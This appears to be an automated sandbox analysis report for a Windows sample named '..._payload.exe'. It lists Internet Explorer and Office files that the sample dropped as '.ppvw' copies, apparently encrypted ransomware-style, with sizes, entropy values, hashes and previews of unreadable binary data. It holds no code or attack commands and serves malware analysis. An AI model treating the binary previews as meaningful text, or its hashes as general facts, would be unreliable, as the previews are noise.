                                                                                                                          Preview:.........O.*.+.C.#...n!A...e...R4.i5.".%....o.....R.Z..:}6..d....M.U?....=[1..k?G.6. ....Yz..w..A...Z.5.x..|..|.b.`.....8p..B.M...+.SP.;.1..j.ar.....y/.'<.\AI...6^.G....L..P..%.G...9j....Z.%.+./E.<.#..N.....Z76.'......`.....:`.m.s....`N.u..........T.......o;H.j..F.)...u,)?..SGP..;.P..x...z.L`..bh....ap.G.4.6d.S..?.g4O.u.r...c. ..d.~..6..,.y...I....^...5..G.w.....S.B.........~.e....../x..|=F} ....f...0.uh.).....4....sc...[.T.>....1...R......./$(SB.c...F.g...G..?.....2..HJB;#...?eA.,...X.....b......Q.N.3n...K.P..#..\...j....[e..s.SDM..Z.A..@ .6<.U.fS..Y{D.Y.A.Q.....L./.CD.T.F..........o:.. &.v.....`U.-S..7.X...V.v]{......8.K.t9..7F...;;.Gq.@[..Y_.......<.(...Q..i.\1.<......c...V.............N>........t.6.+=JO.....=..X..jdW|..T.../..z..N36...N9.L.y...F.5&Z...O.......u....h...7..^..S.47..d.f....%...eX..Pnw...Q@k.~.!......@T.#............{...I..c...,>.jf....|..3..pq3....MI..;...}...t...x..9~.#...i....R..}.KH.G<.n.T.xA....

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edbtmp.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):524622
                                                                                                                          Entropy (8bit):3.2078713496716653
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:DDEtteOyhU84JvSlmJecedJRqb+18/UmhehpwBFjKVau4hEZxp/JQ9y:DDEXyK8CSWecC8+18x0hpwBFYaBE57
                                                                                                                          MD5:595E2D91EBF11B19599728722103F4C0
                                                                                                                          SHA1:5785F96D74914DC56F02F122258A943839D3FB11
                                                                                                                          SHA-256:65800D04F7B75BE2388F9D94DB90FA410483FF7F296B29402F4C0102CA8F3D09
                                                                                                                          SHA-512:7DDBFDDFF406ADDE07BFB2A61FFCF62E0C5AFD5C07EA4DFA840DED8B8A22F02DD83C4D865A5B23D629A2652BD2599E08E5AC07D56D4B6C5E09A9F22024930D31
                                                                                                                          Malicious:false
                                                                                                                          Preview:......NE.`C...#@.....*..M.B.@..PkQ.P.....Bmk%.F..c.]..%.Iz<.3....0j.km..W.NJ..V;$P.07..(..E...U....G)..Q?E.|*.7..x.L.^....o..:..j...W..o...9.5f.. ...-..DR~.l....e@.T.....`..a.-..Q.O...e7OS@.^I.{.Eo(.N}C......Q.(|..`.......I..m./...U.GiS.A.0.....L..z>$h.A........:.o..h..o...B...Z8....I......R&%N..........,_h)....3...G...Lzm.=ZB.....F@JS.;...G*...aV.=.w../o.Y._X%L..b.9f%h.....krxN....k...i.y..._..O..F...J.GhN..?h...$.rK_..a..o..,...\.E.$....3.....B..u..........p..J7..(.9.e..:..D..x...+..O-.C6.3S."....=}..3....L.FmX..284y.(...0.V..?[N....u.i,.%g;o..3k..i..{......D..../1....N.@.1sy..r.Ie.ao......?]...l.p.....=......J..j..=..VE..P.DK.:....f{...nQ.?*..7ij..;5.y&'k....u...}u...S..+...=<./....5..$n..7'.....#...?..k.H\om......S...p/-o..=...>0c....toF1M<n...,.-A.d.../U.....G.zJ...`.Q..1"!:.Sk...a...'.2....i...@u.k..,.n<.m.=jin..x...+..E}..t....M.v........n.....z.%~..s..5._u..[7..G.gT..m.\.R..u.}.f`..Y..Ms..o.3...S...s.L........YR.+h..{S....#.k/../

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3384
                                                                                                                          Entropy (8bit):7.942981690151207
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:H1FFhMSy7hcmI1RrBOU6moPFD13C2QlYr:XMN1u1Rr0PmodD13Cve
                                                                                                                          MD5:79F8BF2252BE00A2DB9064655F9855EC
                                                                                                                          SHA1:6B83E4894633EC757723E0956E233081689C4959
                                                                                                                          SHA-256:8ECBC0E9CAD87845FE2C103CA950BC1E11BBDAFC90D44A416E694358B941D6A9
                                                                                                                          SHA-512:49F6CDFD441EA59779B284A786A4BA0B641CA3B31CA174D8297FA7ACC94D54DFBD75B43A3877CB28A2926FDFFD8EEA7225601CD7EAE22EA98DDBBC96805414C3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..~v.l......V].3.)&.Le.....#....J..7Z...<x4.04.[..S......k......F.%......JH.).{\IA.,./1Z$..,...$t$....8.....6H.9.+.....e.M..6.......@.S.v+...K4.N......_..fqI.V9...5....A@.*..f.....':%{...h..%0.....hY.g..b.a..z.N{..L...Uge....)9..P....;.....T...w@.8....-.`.p4...l...9]...r..f..N...)>..t(4>...).3}....s..A.uL@..q.......8c.."q..... .0....d..Uo..t.#I.....-;..L....gM.`.../@...7#Y....'...%.F.v.K.9E2..>.u./.9&..^.U?..=.h2.*6^.3.mJ.p...g..>..0.w..*.....7'..e+A2.}..a.{.......U.0.N2.`.W..q.QA....|s[...C.0.l.E..X1M......0...m..H.=....aMR..x0...x(..X:..&.....:...>....X..i..xv..).u..V{s.-.`...1.dZ*.@4.q..K.........<.u>...&.X.........'....+..J..*x..+...b...8}\e... ..kJA.1{nl.V..|....]X.Q.r..;j..U.5..n..Bt..l.......M?.;.J......3..2t.tB....Tj&....u1.h.8.@..$J...}.C...zWR:X3..r.^................$...[o..... /`..p.\ktpo.N............[\ec.a.f.c..."..8....0).5.(O^......gA...A.g..QRn^...^...28A.5...U.4.D.p.......$.f.("5m..}W...Q....X...O.zw...S..

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Internet Explorer\brndlog.txt.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6906
                                                                                                                          Entropy (8bit):7.976256345082364
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ICXt0hgesW8W8nI/WqjEdBQMU6DwHT4p1v4:/tggnW8KwQMU6D71w
                                                                                                                          MD5:87B6ED9421660E1A36C33A7E19ADB000
                                                                                                                          SHA1:ED20778D89CCCF77338E8714DC1B5569DAC13D77
                                                                                                                          SHA-256:D41F0AE14A57643C579DE453AE7768C3234685E3C31058D9CB6C84570B670287
                                                                                                                          SHA-512:220493DF46DB83CA4CACC639618EC1CBE205AEC0F8C2FF418E1609EBCFBCEF3585B693ECC45E45BC4225C6F05DFEAE316F2DFF84F49C3988D8AC6DE61B4D5C67
                                                                                                                          Malicious:false
                                                                                                                          Preview:10/03..IB...*.!......$K*.i......W.>lh.O....1.../U....3....UJ.ni.......`^..&.7..Z._%.=..W.r'.U......l].9D.K.i......oY.S.kB..5r....>3.;.'....[...E.\e..I..Z9.U.'.a..8....[..N.Y^.O3...N.].n.6(......V2.X....N{h|..7#.%.m;..T...-.7h.v ...7...u.......S....{z./..REu.).{d0A._...t.!,G.M.....M.Y.ye........4L..z.......S.......T...i[).=N..2.s)>....Vmf.\Nu...E.2..r...;....+.I.%.....V...[_.&....S.u&....._x.......|..T......@.w^8.f........V.....,4...\..4....)..h.y...q.C.R....L.S.....[.,kG..-.X!..5..3..\sQ...f.....:]4.......X.Q^....H......k.A.%] .B.X..........M.d....#q..)D.N...\4R......P>.....,4...........T.....y;.U...{.u..*.U.C...N...R%|......1..s!.)...F...Lh..-(.?Xs..6:..ts..8..7.+..v.}Qs`?..._3.9?a.N.SP..k.N...>.d...3.0".....7...G|.X~.r..^..q.[{@2..8.o.mn.2.Y2.`B...%7.m*.#..1b.E......K.._->............}@i.=....f.)i..._..8.l..D.2.C..s...f.j...n..'x...... .~w`.bc.d.u.G....F.P...vK......]4..........$.....{r.....k0..l.....@.......*...y

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):834
                                                                                                                          Entropy (8bit):7.765044808608182
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Q9CIk5LJe5VdUy9Bw8T6f2fhRO2f8ml1A69BBI1BtiHte8ygDZ+h4Bn4ndq5bTcq:Q9CHVuVCcBw8Hhl2697UqQLITbD
                                                                                                                          MD5:1ED50E50B210C25B61250AC1E3B0FB31
                                                                                                                          SHA1:29FDE77E3E351B1ED642A380FA19201EC86AB591
                                                                                                                          SHA-256:13DEF9E5598DD91BCB0D4265EC0E055383812EFF6B300F0371170D50E3B5B6B2
                                                                                                                          SHA-512:16ACB0BE2E7DE8250F0F2677BCFE3D54F8812AC9F1DDBD46D47823288190C71BF702A2BAD1DA32C8D489A9D4424E98478F14E99FC109FA73D0E06721F6A19ECD
                                                                                                                          Malicious:false
                                                                                                                          Preview:..1.09..N91..Y0.w.a..~:s.\O.... ....0..5......6.4G.J......H.i....^.f}'.{.. ....6Yu..7..+>....L.H....}."|4k;.%.|...q...F......E.s..8x.n.....s|.....3.4..g_f.Y.....g..u...\...;Z......&.o.F.8..0Q>....O.{.W.`....W..$....w.w.).f...k...8.:..;...2P.N.(.3!2.<I..R.Vd....jx...e#.D.E.%..e..........R)..w....o..q.sB.B4w+...]X.~./.....f..../......s..b..u.9..&..o.\) ....L$l..&'..L9'z..$.[k7...<....I.F.=]<..Ldd....{..n.....(..P.G...E..;...{./.....%"X"..H..#.c|..ee.I...l;.^..c..F..+.5+`.."......v%0q/o.0.y:&.......X.?.._=.2".......%.8..a)..7T.H}.w........^..;..i..O.41Q.U..o..V.....P.*b.......7._8...An..E..Z>.....*..W...........G.$.0...$-],(.j<<..GQu.o.D%J.c.c.m..~j......&.>..a...v.q.n....u..[.....qr.K....|...+#.E.[.m...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1740
                                                                                                                          Entropy (8bit):7.874624558264791
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:IjBTHpDeY7nToD0ndH2t9xDstPthW+YjaF8DSD:IjBTHpD/7EDSdH2R0W+h8D6
                                                                                                                          MD5:B037E4EE7C4F70730DDF9A611FBB3642
                                                                                                                          SHA1:FD1EDDC5350E33910C84890612ED2FC816E4A773
                                                                                                                          SHA-256:436BAF779385C62CD6252D1665F851CD9B0FA6EE6ABE62BDF81778AD995167B9
                                                                                                                          SHA-512:83CA43C3793B287D00E84E19AAE01F843FFB6AEB3076343D73AF6D9CD358576234F286915E702FF832EFC8D56C701D397D2ECB39007232E7FA2032EEFBCB935F
                                                                                                                          Malicious:false
                                                                                                                          Preview:..1.0.I..8..,.'...o.MJ.&.x..+..(=..~.}...={.D......=..@.+.s.L.q4.U.'\..k*C..;.!.5. GV..&#..UP.,.r.WG.f!...`...:.m.Y+....V..b...9.SY<.f...S.sz..x.R...g.7....F........%+...&L.Q.?L.@.........FC.. F....-....*z9.....ns.~.`...1..,{.E....Q..;N...v...(.7 ......r..r.M..."p'...O.#y.......o.[b....._3.. .Pau".O..h.j@.2.)...=..bA.}n..p.@..g.n..."..E.f..xr.d.a..F(..vWk.[..... u.4'....\..@.[..(b.^e..N.6ju..*.:.8=...jZz..{..p.G...L5f*..V...@..sO.%.......A.4..@IL]b..T\..d....:....q.....^+t....w.-He/p...YF.E.!.X....A.M.z..(.>..5........<......h.Z*..h.|tC.....k.2.:.'..b.@..W.(r......a......?..?.T..f#L.....w>;`|i...%U:1....>/...d.....O..u..A....:uL..k.".`J.../>.5.$s{......4.I.}.Ms...Dt.-.88xSSgG?.......2.g9J|.b.....5.ez......26.....k.M..hf!.t.X#.a....V....=.R.....9...........wX..\..".\.PU.Z.XZ?.dP...R...S~9........wI.D-iU. ..).....6...XL..0.nV.H.L..(E.j..W5...X}..6.......*.).0KG^.KE`...[u......U.........0.T.^.K..L.GSw.;......U.....9.%H..............VUF.6

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Office\16.0\excel.exe_Rules.xml.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):208087
                                                                                                                          Entropy (8bit):7.725627381056036
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:veGX45HAC8WDpV/rWl17YbjiD/+0CGCqBcKgnFkD+/uF20a:v6HPHHalObjA+XgqGa/uMx
                                                                                                                          MD5:F76488F744D360B14D7566CD9CACF5CC
                                                                                                                          SHA1:1FEB5C331839CA660F134446A07A4448245EFB81
                                                                                                                          SHA-256:0F2F6DE3F237DF8886CA421F9A9089D5C16EDB5F5345E61E0BAFB97751518850
                                                                                                                          SHA-512:48E6EA35E8A72841A54439AF2B42D94DB2BF6E52570A115BD2D3EB65A497536E6CC18521483B3B401BE84F33164311A7889A0C48BA2CB610557382C7225E5649
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.q..].7.?.b.....1.C..F.h.Bo.D......E...U...SAa.3y6.x.Pq3.N.sW.0..ZC.*<.Qy....<...}.8..Zj..H...3.X...PB-....*ruY....p.X'...W.g....u...I$?.../\3+...^...>..n|.y.'r.=.u......g..V.`..._j...u.D.$..75E.4....D.8...-....\..&P..Pu.~7.\m.$L]P...9.=.......f#.....=.......G#aZ..-..n..j`.6...{8s.z....$...^.2...;..p....(.(....F....=Y.R.`.'F...E.g.82.f.......O..!L.Z."....|..t"%N...|v.....4.R...x...h....j.V..<...k..VX.....z):G/a.tJ..[t....n...N#.w.u.......v.h-....u.i.........2<r.....}....y .Q.za".^.L.....&.F....y.`...p.@c[..... t.U.......8...r~........q....N...Q..`..Y.....$..u...G..?...'E7J...ZJ^4.=...g.z.uc."...X:Z....xaE2.m.H(..a...0..7xl..O.y.h..~...{Uy.}".S?..;..V..u...m./....h.....*4.c...Wi^T.*GB[.i+X.f.<..(..H..Hqj....{..........i.B.|...~v.Fx.-..........(..C.-...3.n..G.8W"s=..:.......P.,L.Y...c.._...m. ......,*^..krK.)..o.'.,!)..B.Ar...|/.{..O...Y/:.S.....O......JZ...N...Wm.QL.....2.j~..:...P.3.&36A...%.-BN.[E.To....c.uE.&g7rH../.....

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):321907
                                                                                                                          Entropy (8bit):6.629248343192977
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:jQzboO//zw+XU792wylHVu6KF0OtrA5924e4DlmlOylmfmtn:jsX/rfXUB7gVj24dDlmlOlfmF
                                                                                                                          MD5:07D92401B7B2D417F3CD7D99B8105B9C
                                                                                                                          SHA1:6C6AAE6F025A8E2E051F368C0F82A64CF07D71EF
                                                                                                                          SHA-256:6A75E24CA013049ED5E719C641A64FC54801A5937ED1A29FCDE0338792D7F219
                                                                                                                          SHA-512:35A8CFE24D9F7BDA154134D5D2DFECE683EF20A52B0D319D3027E1A19B56A2CAC2863493F6EC0B10ADE28B8320A5537FEE38C0957D45281942E4C92C5AB2380A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<Rule..t4....gN......_=..xzgw......O.c'..r..[(L.).. .a".e..x.0.......w.....OM..(.+8..tZ..x)B..D.....z..A.D..It.GVWv...I..4..H...*.KN%.R...?.8.b^n.a}/.vt..".b.+..~.....6swk.....!gt....Wd...D....o.G.D.+L..........F.l E..K.X.....E....8..+.A.8`n-&p..%q+..|.g.>O-.u9q:.5.}..`@.o...g#.........P...;..:.G..@.\N..C....\x7..}..;&.h.XIV.|...R.QP.K#.L.^.....Ad.n..p...c!.F.....W.J..8...A5.....n...[H.cOc..$.ke.<...j....etnl8:..7.U.T..4J.....A...3.A..@..%K.....n.3M......2...|@......F4..*...^qK<`...T.....e}.I......1.u...Vo.M..}.t.....Q..`Q.........);.B...)..?..s..~.r2F...5$..p...Cz...d.a.%.-.s..\z.....1=5#.%..l.UK6.w.BjA.`.`....KH...:T..g....m.]......;{.,G7.sO...^..+.J+....O.I{..@..Sb.....i.G......s.>...sA...C.I......b.K./.....|....\t.Scd@.k.).V...*a.F.6D`(i......:....t.]$...._.t!. '.DO.O#....../...;...G.G...}.e....>.}V.k.......b...... P.2.....[....;....81...lE.#,Bt#&........ms._....K..........!a?.-f..m......A.)B.,....r.T.5....*7<.\ ..1.z...

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):361051
                                                                                                                          Entropy (8bit):6.517334067742088
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:0+GD1qD73lobNLF44h4Gt0PjGcJhY7qd4XizBNmERxhhi1s:d/obdP0P1hY70z3mAks
                                                                                                                          MD5:60A77AA5D94EF9D2B1613BDCD999E168
                                                                                                                          SHA1:001B4034C5B80C0A99DFA6986FA28D5455309EB0
                                                                                                                          SHA-256:C30306E69E1409877D36DE54BFC2A344A5040B840AB4157BCF3A9E893928963C
                                                                                                                          SHA-512:59513C1E8C3A413293A84A0DEB1014037062A3A63E81BDA2DD8C937833C7630560CCBFDCAA385D305182CC17BD3358C7DCB2A3599B562F12A8A692E55B4480FE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<Rule...N.N....0.o,.>.k;...O..[.n6...Pi..........p..\.....3.a.-.0...EHS..j\...W.....DcjN..L. .P.aZ..a.B..j...f.Lm."9..(.jQ<...S}..M...=...$`0.xp#3.5-n.:..b. ....t.koe.B7P.p(.6.B.i.$..!S.`...}^..ebN.G.E]g...f#Z...9..'.>,;...6.R.....Q.....?P.d.3..../N......}A~im..Yx&......%?...e.-.v".x.1?.w.l.[..i=...,....WJ.j.c".].O.l.....HP..a...L....}.........S.......$.v...C_..<'..n...#.~..@..>C..v.`..q....FkD....%..W.Z........J..c.Yh.n..."d..xm.....L.?.(l..<Ga..A5./...}2..^..]....Nk....NwBr.0.{)v.j.+....S.-.W.....r...MI......\S..\.O..~..?@.3eE9.?=R....Q..L..I;.q.pS.}..r....5.....j..mc]s..N.....c.1..f+1..Ci_.4...-c.b....._...ky..9F...>W.;...r.=.0Q.K..;G.TlCzJ..G~..z...k.1+....)KMP..vU..A.*.w...e...L....0}...S!...*.&.H..;..r6...M.).hu.W....T.7&.1#...s.o.H.......rx...B.X..4.T[..0*c..z...4.......ZF. ...W..S....?.~...E9.P..qS.+.W.T..!..A^Gp...1\[Y.....P.Qb.k..2q...+P'..Y.g......V......+..{ .T.............^]..0.9|...<.,[.._J~....e.V.2|.<.....I.)

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Office\16.0\officesetup.exe_Rules.xml.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):361051
                                                                                                                          Entropy (8bit):6.513985135289755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:jhXOuxFnhihhkoc/sCmcZYWmVYgQXK+uQn5478+VVttfAXXkHE:DWxXWmVNQaVQ1+VVttfDE
                                                                                                                          MD5:DA561F32E01A8F29FD9EFC850EC53015
                                                                                                                          SHA1:170FF900ECAC034CA817F8B3A25B396C1CAEF54E
                                                                                                                          SHA-256:9A9D984E34A14372866022E8C72D86E95B67FC41899DD8C031D9598DE2F0D4DA
                                                                                                                          SHA-512:69F1FC7CEFA7D90EB4BFF6BD337B1F21695440354259AC29C44D1088CBDA19F5BC77B0D66EB071230A5F55F1839FCE87E5A5DEC857C6757399EBAB164CFF8C92
                                                                                                                          Malicious:false
                                                                                                                          Preview:<Rule..S.......n......&.7T`y:..k^P.ES!..TC...2bl.C.%...<@...I.F'...x.i~..;'.R.?N.).o..B....)gb.`.U...... Q....J.....v..C.Z.u....(g...:....]8...Kl.H..9.k........d."S..X.C.."...V(..E...F........F..xL..e.D.....B..CWgK.>t-R.(.=...ue.E...lM..O .w.0..?..Wc....J#..-....4.)...ws..Um...l....Q.WQ..F...vG..Xk......A]..Cj..P.A.........Z.3.1..H......0.=..:..OW...T..[&F.F......:..........8.w.%......%...w.^Y/.d.....U.}.@.N4.>68zw...%,...Tw1.v`..*CZb.p<....{+.qV.....VW.`.Z."16....y.?...O.o..y6.../F_........R4....^.. l..B./......6.....'Gh.4.R.y._.Y.......J.%F.9..k.A...6.....j.G[<....,C........16...e......m\k..EY..%......[#....:.,|.9..G\.}<.].......9.y..........h.....u[.;I..(.d...pQ...q.\.D..\;.n@....`&%..C.BC...~.Gr.....K.s.v...l-.xd...\Mr.t..4.0..0....w.Y..n.Bg%._uW_t.i3D0L......Q......c..\f......n..\p.D.Y./.G....}.1h.h|.[..o.B8w'R.X..,.n..C....T$7........H6F.X.....7.R.D).n..N.M#.)?E..C.......N...P2..Y.NY....E..k.....m|.%..L..z..{T.(Y`..[......./...n.6...

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Office\16.0\setup32.exe_Rules.xml.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):135031
                                                                                                                          Entropy (8bit):7.998690479427407
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:QSKkVw8Kjg675ta8vf06JRLw+bkkslDXX4QZMAPXPt:Qswjjg6Tv8GLwyslDXIaPft
                                                                                                                          MD5:F7AD3348A61255EF8421F7792098401E
                                                                                                                          SHA1:2A41252D39E133D10032931858E9B767E33BC12A
                                                                                                                          SHA-256:5FECDCED1D6977003D45086E84CD85EC7AE6C98E935FC44CB5E9849E0F76D157
                                                                                                                          SHA-512:74FB10904E338490C4439C1F66AB3B608EF5F650F64CD102869BF073C6485A18843C02D2B28112CFA6955EC3699D95027F2046264F178D50828CB22878D73C8C
                                                                                                                          Malicious:true
                                                                                                                          Preview:<?xml3..(,...............:DB.a.....&G7...>....2:...s..9......l.g..,}C-.g;...tO...~+...<>..9H..MROJ.B.7.Z.W.....:~....^...E((.....8m..A.*.H....8.........x..8_...M..z.>].Rz...M`n...Tt.x".|:..#...7..Qq..I=. .Ol:...vV.o.....&..&............_.$..{.m.;%..w.0C...."Wfs....H..'..`.|.H^\x5~..i^N.....<1.9"J.Bj...K@]....qw.X$$r.y|.....4......c..|.......8O.....O}0y. .f...W..~......N{1s.OT...R%9....KH...q.........Zi.%B'..O......q0..<e....W...,..n..XcZV.ws.....M.c...n......9K.f.L9..;.C..\J...T...@...+...*:..+..z.....<y..1...R....*.Kk.T......L.........8.p93.W.B..1f...%./Y.......X,.p..,0oA.!.. L2.vnaxQ.b..T|TU;..f].F.-.$t......X.WW]..-R.n&..N...G.s....^..l.X}.{.LqP-..a,...un........%.p.t.$.Z...1....yxy.E..d..........|.>"@..Y....h@.Q3....Q.F....LD.vi..F...j.T.*.....*....|\5..#..'L.(..4j.k.4.>.9.V.0x...v....j..r..'o.O./...I[Le..l.....mf..A.<0^y..9|...E.t.....w....?.ag....9...;...R..|...#....:..u._..>..+"^,.+.%k|\\~.X.6..B.O..kV3.w....)+t/.vl.-...w.ya.%..S...

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Office\Features\1-3FeatureCache.txt.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1152
                                                                                                                          Entropy (8bit):7.7862831083514585
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:u0gYb0gTnH17CJp0W6qZvyYm/bJZe0UsVDUR+/21RU518YGpxbD:uR60gTnH17a+W6qcYubJA0UsVDIG2fPX
                                                                                                                          MD5:F95B23D388468E00257B1419A00428FD
                                                                                                                          SHA1:76B368CC73A98D1B409C91168A1E8BEB6B327C28
                                                                                                                          SHA-256:146016A9BE29847CE3DA94904CB1C1837161AFDE397E804DA7DACD184C9A4EF7
                                                                                                                          SHA-512:2073A84384DBB1F2FE5FE11FC41BBBA3DC84860D66EBDAF6EF1396554A940AA64CC66F0E7E78E217A317A7D5A845F615BFF1AE1B0BFC39EBB588CBED9A9B70D4
                                                                                                                          Malicious:false
                                                                                                                          Preview:1.1.9..,.5..p....o... ......c..E-.....Eq..S^..Do.N.`...`DB.0...7q.[.<V...>..Z.1.%....4z.0..F=.!...........v..heo..iUh..l...X2.}......j ...).wx..:m..|..[.p.).&l.JG..\.q.^K...;.....h;N...G.0...kp2.M.c.E+y..O4...\=.....wGn....XL.#...`3..y......Y.r1E....S..{../.V....^.5g.7.Ih....TK.SH;...../:.r=3...,.#Uk.........G.jG|.S..;.h....(....g...Ang....C.X.2..$.../s{.O7.9~....g...D6....F..#...Av..E.!..4.7.p.P.0..m|.=<...J{N....j....T.J.*..s^G.~.P.z#..`..f.,.g.-R.6...6+k..4.*V..J...M.O.4c..~...P...+^I..:.{...*t..M...=.B..7..{,7.^.#..H.a....:.'...O/...y....v..".P...N.H&O...d......I.D....e.F$.U..j........po...j..E..Cl.@..?){D%..3....0.Z.u.k.....]s..r.|.,}.....*OgP.X,........i./P....C;N..o]x.J...$'...Vg.h.:s\_X.t......v.MN......C.M^2.@g.<...56..n.......1XJ...s..a..)\Q.X...RR.v..o.T\..V.f*\K..4.N........T.X.../...0.mk$+:......Y.;...1>..i......P.OGP....l.d.."X..(..V......w.IG5.....s...g..A.fu.......y.....n.C...e.J...kOi.h.V,.%.a..V.....^\...5......~ld...e

                                                                                                                          C:\Users\user\Local Settings\Microsoft\Office\Features\1-7FeatureCache.txt.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1170
                                                                                                                          Entropy (8bit):7.829622148823197
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:whUZbcK898aAdYeFeOu3eYGxYM49mu489OPFaPw2Tl93raFbD:WA33UOFxZYmx89OPgPtp93raVD
                                                                                                                          MD5:8F7CB7149DDB89CC01E3BD962BF19195
                                                                                                                          SHA1:08565BC9487C01523D98BE1E493ABF0611EA5FCF
                                                                                                                          SHA-256:BF2AA3BB99A502398DE42B8153527476D325070152F13E6E85A46C174AC7F411
                                                                                                                          SHA-512:4EF7EC4F638F5F28319833B87849EF88E4AFF766FF3243FDB6C95FE8CAC8654DFC67505926A83105D0D3FE79849DA1871035D580D5B8BC0B16ECA663FC8B5642
                                                                                                                          Malicious:false
